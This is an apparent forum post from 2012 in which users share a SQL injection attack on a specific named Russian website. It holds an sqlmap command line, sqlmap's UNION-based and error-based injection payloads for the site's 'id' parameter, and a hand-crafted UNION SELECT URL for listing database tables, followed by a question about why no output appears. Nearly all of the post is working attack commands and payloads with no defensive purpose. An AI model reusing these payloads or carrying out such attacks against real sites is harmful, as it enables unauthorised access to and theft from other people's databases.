
13.03.2012, 23:07
Guest
xcedz said:
1
sqlmap.py -u "http://zapoved.ru/?act=docs_more&id=3" -p "id" --random-agent --technique=EU --dbms=mysql -v 3
Code:
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: act=docs_more&id=3') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7174643a,0x4b686a6b476d6f6d504f,0x3a7172763a)# AND ('DzDB'='DzDB
Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, [QUERY]#
2
Code:
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: mod=resource&id=31 AND (SELECT 4325 FROM(SELECT COUNT(*),CONCAT(0x3a7361633a,(SELECT (CASE WHEN (4325=4325) THEN 1 ELSE 0 END)),0x3a6f62653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
3
The DBMS is Firebird, no idea, needs some poking around
So why isn't anything getting output?
http://zapoved.ru/?act=docs_more&id=3%27%29+limit+0,0+union+select+1 ,table_name,3,4,5,6,7+from+information_schema.tabl es+limit+0,1+and+%28%27DzDB%27=%27DzDB